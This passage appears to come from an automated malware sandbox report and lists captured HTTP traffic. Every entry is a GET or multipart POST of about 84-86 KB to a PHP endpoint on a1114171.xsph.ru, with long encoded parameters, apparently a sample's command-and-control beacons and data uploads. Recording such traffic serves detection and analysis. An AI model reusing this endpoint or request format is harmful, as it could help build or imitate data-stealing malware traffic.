lSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryBBzPweh8JMphdEJoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1114171.xsph.ruContent-Length: 86543Expect: 100-continue
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nIRZWOKl3Y0JUeNNTRqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryMg3fXKNO9CTcTH9EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86543Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=d1nIVtGVQJFMJJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIyIjNwQjZykTOmVmZilDZmF2N2ITZldjZ1gzMyImZmJGZlFTM3gTYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=QX9JSUNJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlF2YhFmZ2EmZwYGNmNTYiRDZzI2MwUGZmJTMwIjYlBTMmJjYmRWOhJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundarymClRKjoEQKsf6XNJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1114171.xsph.ruContent-Length: 83734Expect: 100-continue
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUS0UFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; 